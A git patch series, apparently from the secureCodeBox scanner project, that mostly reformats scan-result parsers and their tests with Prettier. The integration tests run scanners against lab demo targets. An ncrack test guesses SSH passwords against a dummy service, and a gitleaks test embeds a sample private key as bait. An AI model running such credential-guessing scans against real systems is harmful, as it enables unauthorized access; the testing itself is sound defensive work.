+0200 Subject: [PATCH 016/137] reenable amass in ci Signed-off-by: Jannik Hollenbach --- .github/workflows/ci.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 035c5aacd2..89dfc90595 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -418,7 +418,7 @@ jobs: fail-fast: false matrix: unit: - # - amass + - amass # - cmseek # - ffuf # - git-repo-scanner From 87b84176370f85e360489a5a1f7d56741c1602bf Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 16 Jun 2025 20:47:08 +0200 Subject: [PATCH 017/137] Reformat w/ prettier Signed-off-by: Jannik Hollenbach --- .../cmseek/integration-tests/cmseek.test.js | 16 +- scanners/cmseek/parser/parser.js | 62 +-- scanners/cmseek/parser/parser.test.js | 8 +- scanners/ffuf/integration-tests/ffuf.test.js | 33 +- scanners/ffuf/parser/parser.js | 13 +- scanners/ffuf/parser/parser.test.js | 14 +- .../git-repo-scanner.test.js | 4 +- scanners/git-repo-scanner/parser/parser.js | 4 +- .../git-repo-scanner/parser/parser.test.js | 4 +- .../integration-tests/gitleaks.test.js | 64 +-- scanners/gitleaks/parser/parser.js | 55 +-- scanners/gitleaks/parser/parser.test.js | 14 +- .../integration-tests/kube-hunter.test.js | 4 +- scanners/kube-hunter/parser/parser.js | 20 +- scanners/kube-hunter/parser/parser.test.js | 6 +- .../ncrack/integration-tests/ncrack.test.js | 4 +- scanners/ncrack/parser/parser.js | 19 +- scanners/ncrack/parser/parser.test.js | 16 +- .../nikto/integration-tests/nikto.test.js | 4 +- scanners/nikto/parser/parser.js | 10 +- scanners/nikto/parser/parser.test.js | 10 +- scanners/nmap/parser/parser.js | 418 +++++++++--------- .../integration-tests/screenshooter.test.js | 9 +- scanners/screenshooter/parser/parser.js | 3 +- scanners/screenshooter/parser/parser.test.js | 2 +- .../semgrep/integration-tests/semgrep.test.js | 4 +- scanners/semgrep/parser/parser.test.js | 6 +- .../integration-tests/ssh-audit.test.js | 12 +- scanners/ssh-audit/parser/parser.js | 11 +- scanners/ssh-audit/parser/parser.test.js | 6 +- .../sslyze/integration-tests/sslyze.test.js | 10 +- scanners/sslyze/parser/parser.js | 64 ++- scanners/sslyze/parser/parser.test.js | 24 +- scanners/test-scan/parser/parser.js | 80 ++-- .../integration-tests/trivy-sbom.test.js | 10 +- scanners/trivy-sbom/parser/parser.test.js | 8 +- .../trivy/integration-tests/trivy.test.js | 80 ++-- scanners/trivy/parser/parser.js | 277 ++++++++---- scanners/trivy/parser/parser.test.js | 46 +- .../whatweb/integration-tests/whatweb.test.js | 15 +- scanners/whatweb/parser/parser.js | 81 ++-- scanners/whatweb/parser/parser.test.js | 10 +- .../wpscan/integration-tests/wpscan.test.js | 4 +- scanners/wpscan/parser/parser.js | 164 +++---- scanners/wpscan/parser/parser.test.js | 8 +- 45 files changed, 960 insertions(+), 776 deletions(-) diff --git a/scanners/cmseek/integration-tests/cmseek.test.js b/scanners/cmseek/integration-tests/cmseek.test.js index 7e26f54f47..988b0e2c85 100644 --- a/scanners/cmseek/integration-tests/cmseek.test.js +++ b/scanners/cmseek/integration-tests/cmseek.test.js @@ -9,11 +9,11 @@ jest.retryTimes(3); test( "cmseek scans old-joomla for vulnerabilities without redirection", async () => { - const {categories, severities, count} = await scan( + const { categories, severities, count } = await scan( "cmseek-old-joomla", "cmseek", ["-u", "old-joomla.demo-targets.svc", "--no-redirect"], - 90 + 90, ); expect(count).toBe(3); @@ -30,17 +30,17 @@ test( } `); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); test( "cmseek scans old-joomla for vulnerabilities with redirection", async () => { - const {categories, severities, count} = await scan( + const { categories, severities, count } = await scan( "cmseek-old-joomla", "cmseek", ["-u", "old-joomla.demo-targets.svc", "--follow-redirect"], - 90 + 90, ); expect(count).toBe(1); @@ -55,15 +55,15 @@ test( } `); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); test( "Invalid argument should be marked as errored", async () => { await expect( - scan("cmseek-invalidArg", "cmseek", ["--invalidArg", "example.com"], 90) + scan("cmseek-invalidArg", "cmseek", ["--invalidArg", "example.com"], 90), ).rejects.toThrow("HTTP request failed"); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); diff --git a/scanners/cmseek/parser/parser.js b/scanners/cmseek/parser/parser.js index 3c9fe3c98d..17b480f632 100644 --- a/scanners/cmseek/parser/parser.js +++ b/scanners/cmseek/parser/parser.js @@ -3,17 +3,17 @@ // SPDX-License-Identifier: Apache-2.0 async function parse(findings) { - let results = [] + let results = []; // Making sure the CMS is Joomla if (findings.cms_id != "joom") { - return results + return results; } // Check if debug mode is enabled ; if yes add finding - let parsed_debug_mode_enabled = [] + let parsed_debug_mode_enabled = []; - // I ran into an issue where the time coverted to ISO String was dependant from the timezone of the machine running the test. + // I ran into an issue where the time coverted to ISO String was dependant from the timezone of the machine running the test. // This means that if GitHub Actions CI time and local time are different the test will fail. - // To fix this we need to enforce the timezone in the date string. + // To fix this we need to enforce the timezone in the date string. // cmseek uses the timezone of the machine running the scan, so it will be different machine to machine (or cloud service). // https://github.com/Tuhinshubhra/CMSeeK/blob/ce085fee1b5f48db7412911e399bb2c771e73a0f/cmseekdb/basic.py#L296 // For simplicity UTC time is enforced, and that is by adding a Z to the end of the date string. @@ -27,11 +27,11 @@ async function parse(findings) { location: findings.url, osi_layer: "APPLICATION", severity: "MEDIUM", - } + }; } // Check if backup files are open; if yes add finding - let parsed_backupFiles = [] + let parsed_backupFiles = []; if ("joomla_backup_files" in findings) { parsed_backupFiles = { name: "Backup files", @@ -42,36 +42,40 @@ async function parse(findings) { osi_layer: "APPLICATION", severity: "INFORMATIONAL", attributes: { - joomla_backup_files: findings.joomla_backup_files - } - } + joomla_backup_files: findings.joomla_backup_files, + }, + }; } // Check if any core vulnerabilities exist; if yes list findings - let parsed_vulnerabilities = [] + let parsed_vulnerabilities = []; if (findings.vulnerabilities_count > 0) { - parsed_vulnerabilities = findings.vulnerabilities.map(vuln => { + parsed_vulnerabilities = findings.vulnerabilities.map((vuln) => { // Fetch CVE from vulnerability references const cve = fetchCVE(vuln.references); const separator = " : "; - + // Create CVE reference object if CVE exists - const cve_reference = cve ? [ - { type: "CVE", value: cve }, - { type: "URL", value: `https://www.cve.org/CVERecord?id=${cve}` } - ] : []; // Empty array if no CVE exists - + const cve_reference = cve + ? [ + { type: "CVE", value: cve }, + { type: "URL", value: `https://www.cve.org/CVERecord?id=${cve}` }, + ] + : []; // Empty array if no CVE exists + // Create URL reference objects from the vulnerability references const urls_references = vuln.references - .filter(ref => ref.includes("http")) - .map(ref => ({ + .filter((ref) => ref.includes("http")) + .map((ref) => ({ type: "URL", // Extract the URL if the reference includes the separator, otherwise use the whole reference - value: ref.includes(separator) ? ref.split(separator)[1].trim() : ref + value: ref.includes(separator) ? ref.split(separator)[1].trim() : ref, })); - + // Combine URL and CVE references, and filter out any empty reference - const references = [...urls_references, ...cve_reference].filter(r => r); - + const references = [...urls_references, ...cve_reference].filter( + (r) => r, + ); + // Return the parsed vulnerability object return { name: vuln.name, @@ -84,13 +88,15 @@ async function parse(findings) { references: references.length > 0 ? references : null, attributes: { joomla_version: findings.joomla_version, - references: vuln.references - } + references: vuln.references, + }, }; }); - } + } // concat all parsed results - return parsed_vulnerabilities.concat(parsed_backupFiles).concat(parsed_debug_mode_enabled) + return parsed_vulnerabilities + .concat(parsed_backupFiles) + .concat(parsed_debug_mode_enabled); } // Helper function to fetch CVE from references // it is assumed that the reference is in the format "CVE : CVE-XXXX-XXXX" diff --git a/scanners/cmseek/parser/parser.test.js b/scanners/cmseek/parser/parser.test.js index a619f2fa9e..72ce410236 100644 --- a/scanners/cmseek/parser/parser.test.js +++ b/scanners/cmseek/parser/parser.test.js @@ -18,7 +18,7 @@ test("parser parses result of Joomla scan with core vulnerabilities successfully __dirname + "/__testFiles__/joomla_with_core_vulns.json", { encoding: "utf8", - } + }, ); const findings = await parse(JSON.parse(fileContent)); @@ -31,7 +31,7 @@ test("parser parses result of Joomla scan without core vulnerabilities successfu __dirname + "/__testFiles__/joomla_without_core_vulns.json", { encoding: "utf8", - } + }, ); const findings = await parse(JSON.parse(fileContent)); @@ -44,7 +44,7 @@ test("parser parses result of non-Joomla scan successfully", async () => { __dirname + "/__testFiles__/not_joomla.json", { encoding: "utf8", - } + }, ); const findings = await parse(JSON.parse(fileContent)); @@ -57,7 +57,7 @@ test("should properly parse empty cmseek json file", async () => { __dirname + "/__testFiles__/test-empty-report.json", { encoding: "utf8", - } + }, ); const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); diff --git a/scanners/ffuf/integration-tests/ffuf.test.js b/scanners/ffuf/integration-tests/ffuf.test.js index 9669de6358..d3dece4cbd 100644 --- a/scanners/ffuf/integration-tests/ffuf.test.js +++ b/scanners/ffuf/integration-tests/ffuf.test.js @@ -12,19 +12,28 @@ test( const { categories, severities, count } = await scan( "ffuf-scan-juiceshop-demo", "ffuf", - ["-u", "http://juiceshop.demo-targets.svc:3000/FUZZ", "-w", "/config/wordlist.txt"], + [ + "-u", + "http://juiceshop.demo-targets.svc:3000/FUZZ", + "-w", + "/config/wordlist.txt", + ], 60 * 2, // volumes - [{ - "name": "ffuf-wordlist-config", - "configMap": {"name": "ffuf-wordlist-config-map"} - }], + [ + { + name: "ffuf-wordlist-config", + configMap: { name: "ffuf-wordlist-config-map" }, + }, + ], // volumeMounts - [{ - "name": "ffuf-wordlist-config", - "mountPath": "/config/wordlist.txt", - "subPath": "wordlist.txt" - }] + [ + { + name: "ffuf-wordlist-config", + mountPath: "/config/wordlist.txt", + subPath: "wordlist.txt", + }, + ], ); // There must be at least one finding @@ -33,8 +42,8 @@ test( "Webserver Content": 2, }); expect(severities).toEqual({ - informational: 2 + informational: 2, }); }, - 60 * 3 * 1000 + 60 * 3 * 1000, ); diff --git a/scanners/ffuf/parser/parser.js b/scanners/ffuf/parser/parser.js index 0b81a625d6..a04b1bc6e3 100644 --- a/scanners/ffuf/parser/parser.js +++ b/scanners/ffuf/parser/parser.js @@ -3,19 +3,18 @@ // SPDX-License-Identifier: Apache-2.0 async function parse(fileContent) { - if (!fileContent || !fileContent.results || fileContent.results.length == 0) { return []; } - return fileContent.results.map(result => { + return fileContent.results.map((result) => { const time = new Date(fileContent.time).toISOString(); return { - name: 'Webserver Content', + name: "Webserver Content", description: `Content [${result.input ? Object.values(result.input) : ""}] was found on the webserver ${result.host}.`, // todo rn: what if no FUZZ keyword is used?? identified_at: time, - osi_layer: 'APPLICATION', - severity: 'INFORMATIONAL', - category: 'Webserver Content', + osi_layer: "APPLICATION", + severity: "INFORMATIONAL", + category: "Webserver Content", attributes: { httpStatus: result.status, length: result.length, @@ -35,7 +34,7 @@ async function parse(fileContent) { headers: fileContent?.config?.headers, }, location: result.url, - } + }; }); } diff --git a/scanners/ffuf/parser/parser.test.js b/scanners/ffuf/parser/parser.test.js index f886d6f505..ace135133b 100644 --- a/scanners/ffuf/parser/parser.test.js +++ b/scanners/ffuf/parser/parser.test.js @@ -7,13 +7,13 @@ const { validateParser, } = require("@securecodebox/parser-sdk-nodejs/parser-utils"); -const {parse} = require("./parser"); +const { parse } = require("./parser"); test("should properly parse ffuf json file", async () => { const fileContent = JSON.parse( await readFile(__dirname + "/__testFiles__/ffuf-results.json", { encoding: "utf8", - }) + }), ); const findings = await parse(fileContent); // validate findings @@ -78,8 +78,8 @@ test("should properly parse ffuf json file wih multiple fuzz keyword inputs", as __dirname + "/__testFiles__/ffuf-results-multiple-fuzz-keywords.json", { encoding: "utf8", - } - ) + }, + ), ); const findings = await parse(fileContent); // validate findings @@ -119,7 +119,7 @@ test("should properly parse ffuf json file with postdata", async () => { const fileContent = JSON.parse( await readFile(__dirname + "/__testFiles__/ffuf-results-postdata.json", { encoding: "utf8", - }) + }), ); const findings = await parse(fileContent); // validate findings @@ -161,7 +161,7 @@ test("should properly parse empty json file", async () => { const fileContent = JSON.parse( await readFile(__dirname + "/__testFiles__/empty.json", { encoding: "utf8", - }) + }), ); const findings = await parse(fileContent); // validate findings @@ -173,7 +173,7 @@ test("should properly parse zero findings json file", async () => { const fileContent = JSON.parse( await readFile(__dirname + "/__testFiles__/zeroFindings.json", { encoding: "utf8", - }) + }), ); const findings = await parse(fileContent); // validate findings diff --git a/scanners/git-repo-scanner/integration-tests/git-repo-scanner.test.js b/scanners/git-repo-scanner/integration-tests/git-repo-scanner.test.js index 86f86aba00..7b1763e54e 100644 --- a/scanners/git-repo-scanner/integration-tests/git-repo-scanner.test.js +++ b/scanners/git-repo-scanner/integration-tests/git-repo-scanner.test.js @@ -15,10 +15,10 @@ test( "git-repo-scanner-dummy-scan", "git-repo-scanner", ["--git-type", "github", "--organization", "secureCodeBox"], - 90 + 90, ); // There must be >= 28 Repositories found in the GitHub secureCodeBox organisation. expect(count).toBeGreaterThanOrEqual(28); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); diff --git a/scanners/git-repo-scanner/parser/parser.js b/scanners/git-repo-scanner/parser/parser.js index e83798c422..910b1b9d55 100644 --- a/scanners/git-repo-scanner/parser/parser.js +++ b/scanners/git-repo-scanner/parser/parser.js @@ -2,8 +2,8 @@ // // SPDX-License-Identifier: Apache-2.0 -async function parse (fileContent) { - return fileContent +async function parse(fileContent) { + return fileContent; } module.exports.parse = parse; diff --git a/scanners/git-repo-scanner/parser/parser.test.js b/scanners/git-repo-scanner/parser/parser.test.js index c473e15a20..760dfb1475 100644 --- a/scanners/git-repo-scanner/parser/parser.test.js +++ b/scanners/git-repo-scanner/parser/parser.test.js @@ -14,7 +14,7 @@ test("should properly parse empty json file", async () => { __dirname + "/__testFiles__/empty-findings.json", { encoding: "utf8", - } + }, ); const findings = await parse(JSON.parse(fileContent)); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -26,7 +26,7 @@ test("should properly parse git-scanner json file", async () => { __dirname + "/__testFiles__/git-scanner-test-findings.json", { encoding: "utf8", - } + }, ); const findings = await parse(JSON.parse(fileContent)); await expect(validateParser(findings)).resolves.toBeUndefined(); diff --git a/scanners/gitleaks/integration-tests/gitleaks.test.js b/scanners/gitleaks/integration-tests/gitleaks.test.js index ba9dbd404e..bcb46b1f4e 100644 --- a/scanners/gitleaks/integration-tests/gitleaks.test.js +++ b/scanners/gitleaks/integration-tests/gitleaks.test.js @@ -12,30 +12,32 @@ test( const { categories, severities, count } = await scan( "gitleaks-dummy-scan", "gitleaks", - [ - "detect", - "--source", - "/repo/" - ], + ["detect", "--source", "/repo/"], 90, // volumes - [{ - "name": "test-dir", - "emptyDir": {} - }], + [ + { + name: "test-dir", + emptyDir: {}, + }, + ], // volumeMounts - [{ - "mountPath": "/repo/", - "name": "test-dir" - }], + [ + { + mountPath: "/repo/", + name: "test-dir", + }, + ], // initContainers - [{ - "name": "init-git", - "image": "bitnami/git", - "command": ["bash", - "-c", - // Bash script to create a git repo with a demo file - `cd /repo && \\ + [ + { + name: "init-git", + image: "bitnami/git", + command: [ + "bash", + "-c", + // Bash script to create a git repo with a demo file + `cd /repo && \\ git init && \\ echo '-----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW @@ -47,12 +49,16 @@ vOLRZhe7xrVYy3d0FUmGAAAAFnlvdXJfZW1haWxAZXhhbXBsZS5jb20BAgMEBQYH git config --global user.name test && \\ git config --global user.email user@example.com && \\ git add secret.pem && \\ - git commit -m test`], - "volumeMounts": [{ - "mountPath": "/repo/", - "name": "test-dir" - }] - }] + git commit -m test`, + ], + volumeMounts: [ + { + mountPath: "/repo/", + name: "test-dir", + }, + ], + }, + ], ); expect(count).toBe(1); @@ -60,8 +66,8 @@ vOLRZhe7xrVYy3d0FUmGAAAAFnlvdXJfZW1haWxAZXhhbXBsZS5jb20BAgMEBQYH "Potential Secret": 1, }); expect(severities).toEqual({ - medium: 1 + medium: 1, }); }, - 3 * 60 * 1000 -); \ No newline at end of file + 3 * 60 * 1000, +); diff --git a/scanners/gitleaks/parser/parser.js b/scanners/gitleaks/parser/parser.js index efc0b2cd26..2ef05c99fa 100644 --- a/scanners/gitleaks/parser/parser.js +++ b/scanners/gitleaks/parser/parser.js @@ -5,29 +5,28 @@ const HIGH_TAGS = ["HIGH"]; const LOW_TAGS = ["LOW"]; -const repoUrlAnnotationKey = "metadata.scan.securecodebox.io/git-repo-url" - -async function parse (fileContent, scan) { +const repoUrlAnnotationKey = "metadata.scan.securecodebox.io/git-repo-url"; +async function parse(fileContent, scan) { if (fileContent) { const commitUrlBase = prepareCommitUrl(scan); - return fileContent.map(finding => { - - let severity = 'MEDIUM'; - + return fileContent.map((finding) => { + let severity = "MEDIUM"; + if (containsTag(finding.Tags, HIGH_TAGS)) { - severity = 'HIGH' + severity = "HIGH"; } else if (containsTag(finding.Tags, LOW_TAGS)) { - severity = 'LOW' + severity = "LOW"; } - + return { name: finding.RuleID, - description: 'The name of the rule which triggered the finding: ' + finding.RuleID, - osi_layer: 'APPLICATION', + description: + "The name of the rule which triggered the finding: " + finding.RuleID, + osi_layer: "APPLICATION", severity: severity, - category: 'Potential Secret', + category: "Potential Secret", attributes: { commit: commitUrlBase + finding.Commit, description: finding.Description, @@ -38,32 +37,34 @@ async function parse (fileContent, scan) { file: finding.File, line_number: finding.StartLine, tags: finding.Tags, - line: finding.Match - } - } + line: finding.Match, + }, + }; }); - } - else - { + } else { return []; } } -function containsTag (tag, tags) { - let result = tags.filter(longTag => tag.includes(longTag)); +function containsTag(tag, tags) { + let result = tags.filter((longTag) => tag.includes(longTag)); return result.length > 0; } -function prepareCommitUrl (scan) { - if (!scan || !scan.metadata.annotations || !scan.metadata.annotations[repoUrlAnnotationKey]) { - return ''; +function prepareCommitUrl(scan) { + if ( + !scan || + !scan.metadata.annotations || + !scan.metadata.annotations[repoUrlAnnotationKey] + ) { + return ""; } var repositoryUrl = scan.metadata.annotations[repoUrlAnnotationKey]; - return repositoryUrl.endsWith('/') ? - repositoryUrl + 'commit/' - : repositoryUrl + '/commit/' + return repositoryUrl.endsWith("/") + ? repositoryUrl + "commit/" + : repositoryUrl + "/commit/"; } module.exports.parse = parse; diff --git a/scanners/gitleaks/parser/parser.test.js b/scanners/gitleaks/parser/parser.test.js index 7c319e3a76..d05b942aa1 100644 --- a/scanners/gitleaks/parser/parser.test.js +++ b/scanners/gitleaks/parser/parser.test.js @@ -14,7 +14,7 @@ test("should properly parse empty gitleaks json file", async () => { __dirname + "/__testFiles__/test-empty-report.json", { encoding: "utf8", - } + }, ); const findings = await parse(JSON.parse(jsonContent)); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -26,7 +26,7 @@ test("should properly parse gitleaks json file with null result", async () => { __dirname + "/__testFiles__/test-null-report.json", { encoding: "utf8", - } + }, ); const findings = await parse(JSON.parse(jsonContent)); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -38,7 +38,7 @@ test("should properly parse gitleaks json file", async () => { __dirname + "/__testFiles__/test-report.json", { encoding: "utf8", - } + }, ); const findings = await parse(JSON.parse(jsonContent)); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -131,7 +131,7 @@ test("should define severity based on tags in result file", async () => { __dirname + "/__testFiles__/test-report-tags.json", { encoding: "utf8", - } + }, ); const findings = await parse(JSON.parse(jsonContent)); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -221,7 +221,7 @@ test("should properly construct commit URL if given in scan annotation without t __dirname + "/__testFiles__/test-report.json", { encoding: "utf8", - } + }, ); const findings = await parse(JSON.parse(jsonContent), scan); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -328,7 +328,7 @@ test("should properly construct commit URL if given in scan annotation with trai __dirname + "/__testFiles__/test-report.json", { encoding: "utf8", - } + }, ); const findings = await parse(JSON.parse(jsonContent), scan); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -415,4 +415,4 @@ test("should properly construct commit URL if given in scan annotation with trai }, ] `); -}); \ No newline at end of file +}); diff --git a/scanners/kube-hunter/integration-tests/kube-hunter.test.js b/scanners/kube-hunter/integration-tests/kube-hunter.test.js index cfa1931c8d..fcaab8ec20 100644 --- a/scanners/kube-hunter/integration-tests/kube-hunter.test.js +++ b/scanners/kube-hunter/integration-tests/kube-hunter.test.js @@ -13,12 +13,12 @@ test( "kube-hunter-in-cluster", "kube-hunter", ["--pod", "--quick"], - 4 * 60 + 4 * 60, ); // If we got here the scan succeeded // as the number of findings will depend on the cluster, we just check if it is defined at all expect(true).toBe(true); }, - 5 * 60 * 1000 + 5 * 60 * 1000, ); diff --git a/scanners/kube-hunter/parser/parser.js b/scanners/kube-hunter/parser/parser.js index 7ecd6baa04..1df89ae428 100644 --- a/scanners/kube-hunter/parser/parser.js +++ b/scanners/kube-hunter/parser/parser.js @@ -3,23 +3,23 @@ // SPDX-License-Identifier: Apache-2.0 async function parse({ vulnerabilities = [], nodes = [] }) { - return vulnerabilities.map(vulnerability => { - const reference = {} + return vulnerabilities.map((vulnerability) => { + const reference = {}; - if ( vulnerability.vid !== "None") { - reference.id = vulnerability.vid - reference.source = `https://aquasecurity.github.io/kube-hunter/kb/${vulnerability.vid}` + if (vulnerability.vid !== "None") { + reference.id = vulnerability.vid; + reference.source = `https://aquasecurity.github.io/kube-hunter/kb/${vulnerability.vid}`; } let location = vulnerability.location; - if (location.startsWith('Local to Pod')) { + if (location.startsWith("Local to Pod")) { // This is a pod specific vulnerability. // As this does not fit the secureCodeBox model to well we will scope this to the first "Node/Master" type node of the cluster. // This is subject to change. for (const node of nodes) { if (node.type === "Node/Master") { - location = node.location + location = node.location; break; } } @@ -35,13 +35,13 @@ async function parse({ vulnerabilities = [], nodes = [] }) { attributes: { evidence: vulnerability.evidence, kubeHunterRule: vulnerability.hunter, - } + }, }; }); } -function toValidUrl(location){ - return "tcp://"+location +function toValidUrl(location) { + return "tcp://" + location; } module.exports.parse = parse; diff --git a/scanners/kube-hunter/parser/parser.test.js b/scanners/kube-hunter/parser/parser.test.js index 1fa447caef..c1544e324c 100644 --- a/scanners/kube-hunter/parser/parser.test.js +++ b/scanners/kube-hunter/parser/parser.test.js @@ -15,8 +15,8 @@ test("parses result from kind-1.18-in-cluster-scan correctly", async () => { __dirname + "/__testFiles__/kind-1.18-in-cluster-scan.json", { encoding: "utf8", - } - ) + }, + ), ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -28,7 +28,7 @@ test("should properly parse empty kube-hunter json file", async () => { __dirname + "/__testFiles__/test-empty-report.json", { encoding: "utf8", - } + }, ); const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); diff --git a/scanners/ncrack/integration-tests/ncrack.test.js b/scanners/ncrack/integration-tests/ncrack.test.js index 34a5c73021..f9d6b716d2 100644 --- a/scanners/ncrack/integration-tests/ncrack.test.js +++ b/scanners/ncrack/integration-tests/ncrack.test.js @@ -18,7 +18,7 @@ test( "--pass=THEPASSWORDYOUCREATED,12345", "ssh://dummy-ssh.demo-targets.svc", ], - 90 + 90, ); expect(count).toBe(1); @@ -29,5 +29,5 @@ test( high: 1, }); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); diff --git a/scanners/ncrack/parser/parser.js b/scanners/ncrack/parser/parser.js index c7fb7f0fa6..b04c4accac 100644 --- a/scanners/ncrack/parser/parser.js +++ b/scanners/ncrack/parser/parser.js @@ -4,19 +4,20 @@ const xml2js = require("xml2js"); const crypto = require("crypto"); -const {readFile} = require("fs/promises"); +const { readFile } = require("fs/promises"); async function parse( fileContent, scan, - encryptionKeyLocation = process.env["ENCRYPTION_KEY_LOCATION"] + encryptionKeyLocation = process.env["ENCRYPTION_KEY_LOCATION"], ) { - const {ncrackrun} = await transformXML(fileContent); + const { ncrackrun } = await transformXML(fileContent); let publicKey = null; if (encryptionKeyLocation) { publicKey = await readPublicKey(encryptionKeyLocation).catch(() => { console.log( - "Public key not found on file system location: " + encryptionKeyLocation + "Public key not found on file system location: " + + encryptionKeyLocation, ); process.exit(); }); @@ -25,12 +26,12 @@ async function parse( } function transformToFindings(ncrackrun, publicKey) { - return ncrackrun.service.flatMap(({address, port, credentials = []}) => { - const {addr: ipAddress} = address[0]["$"]; - const {protocol, portid, name: portName} = port[0]["$"]; + return ncrackrun.service.flatMap(({ address, port, credentials = [] }) => { + const { addr: ipAddress } = address[0]["$"]; + const { protocol, portid, name: portName } = port[0]["$"]; return credentials.map((credential) => { - let {username, password} = credential["$"]; + let { username, password } = credential["$"]; if (publicKey) { password = crypto @@ -39,7 +40,7 @@ function transformToFindings(ncrackrun, publicKey) { key: publicKey, padding: crypto.constants.RSA_PKCS1_OAEP_PADDING, }, - Buffer.from(password) + Buffer.from(password), ) .toString("base64"); } diff --git a/scanners/ncrack/parser/parser.test.js b/scanners/ncrack/parser/parser.test.js index e2b1af8dcb..42c4983d6a 100644 --- a/scanners/ncrack/parser/parser.test.js +++ b/scanners/ncrack/parser/parser.test.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const {parse} = require("./parser"); +const { parse } = require("./parser"); const fs = require("fs"); const crypto = require("crypto"); const { @@ -15,7 +15,7 @@ it("should return no findings when ncrack has not found credentials", async () = __dirname + "/__testFiles__/ncrack_no_results.xml", { encoding: "utf8", - } + }, ); const findings = await parse(ncrackXML); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -28,7 +28,7 @@ it("should return findings when ncrack found credentials", async () => { __dirname + "/__testFiles__/ncrack_with_results.xml", { encoding: "utf8", - } + }, ); const findings = await parse(ncrackXML); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -63,7 +63,7 @@ it("should return no findings when ncrack has not found credentials scanning two __dirname + "/__testFiles__/ncrack_two_services_no_results.xml", { encoding: "utf8", - } + }, ); const findings = await parse(ncrackXML); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -77,7 +77,7 @@ it("should return findings when ncrack found two credentials scanning two servic __dirname + "/__testFiles__/ncrack_two_services_with_results.xml", { encoding: "utf8", - } + }, ); const findings = await parse(ncrackXML); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -131,12 +131,12 @@ it("should encrypt findings when a public key is set", async () => { __dirname + "/__testFiles__/ncrack_with_results.xml", { encoding: "utf8", - } + }, ); const [finding] = await parse( ncrackXML, null, - __dirname + "/__testFiles__/public_key.pem" + __dirname + "/__testFiles__/public_key.pem", ); let decryptedData = crypto.privateDecrypt( @@ -144,7 +144,7 @@ it("should encrypt findings when a public key is set", async () => { key: privateKey, padding: crypto.constants.RSA_PKCS1_OAEP_PADDING, }, - Buffer.from(finding.attributes.password, "base64") + Buffer.from(finding.attributes.password, "base64"), ); expect(finding.attributes.password.length).toBe(172); diff --git a/scanners/nikto/integration-tests/nikto.test.js b/scanners/nikto/integration-tests/nikto.test.js index 3f91a5364f..5e56351f35 100644 --- a/scanners/nikto/integration-tests/nikto.test.js +++ b/scanners/nikto/integration-tests/nikto.test.js @@ -18,7 +18,7 @@ test( "-Tuning", "1,2,3,5,7,b", ], // See nikto bodgeit example - 90 + 90, ); expect(categories).toMatchInlineSnapshot(` @@ -36,5 +36,5 @@ test( } `); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); diff --git a/scanners/nikto/parser/parser.js b/scanners/nikto/parser/parser.js index 7f9b971074..7c7da0c7bd 100644 --- a/scanners/nikto/parser/parser.js +++ b/scanners/nikto/parser/parser.js @@ -11,7 +11,7 @@ const HIGH = "HIGH"; * * @param {string} category */ -function categorize({id}) { +function categorize({ id }) { if (id === 999957) { return ["X-Frame-Options Header", LOW]; } else if (id === 999102) { @@ -45,7 +45,7 @@ async function parse(niktoReport) { if (!niktoReport) return []; return niktoReport.flatMap( - ({host, ip, port: portString, banner, vulnerabilities}) => { + ({ host, ip, port: portString, banner, vulnerabilities }) => { const port = parseInt(portString, 10); if (!vulnerabilities) @@ -54,10 +54,10 @@ async function parse(niktoReport) { return vulnerabilities .filter(Boolean) - .map(({id, method, url, msg, references}) => { + .map(({ id, method, url, msg, references }) => { const niktoId = parseInt(id, 10); - const [category, severity] = categorize({id: niktoId}); + const [category, severity] = categorize({ id: niktoId }); // We can only guess at this point. Nikto doesn't tell use anymore :( const protocol = port === 443 || port === 8443 ? "https" : "http"; @@ -101,7 +101,7 @@ async function parse(niktoReport) { }, }; }); - } + }, ); } diff --git a/scanners/nikto/parser/parser.test.js b/scanners/nikto/parser/parser.test.js index e597e6e38f..16691fbdc8 100644 --- a/scanners/nikto/parser/parser.test.js +++ b/scanners/nikto/parser/parser.test.js @@ -7,13 +7,13 @@ const { validateParser, } = require("@securecodebox/parser-sdk-nodejs/parser-utils"); -const {parse} = require("./parser"); +const { parse } = require("./parser"); test("parses www.securecodebox.io result file into findings", async () => { const fileContent = JSON.parse( await readFile(__dirname + "/__testFiles__/docs.securecodebox.io.json", { encoding: "utf8", - }) + }), ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -24,7 +24,7 @@ test("parses OWASP Juice Shop result file into findings", async () => { const fileContent = JSON.parse( await readFile(__dirname + "/__testFiles__/juice-shop.json", { encoding: "utf8", - }) + }), ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -35,7 +35,7 @@ test("should properly parse empty json file", async () => { const fileContent = JSON.parse( await readFile(__dirname + "/__testFiles__/empty-report.json", { encoding: "utf8", - }) + }), ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -46,7 +46,7 @@ test("parses 'no web server found' finding correctly", async () => { 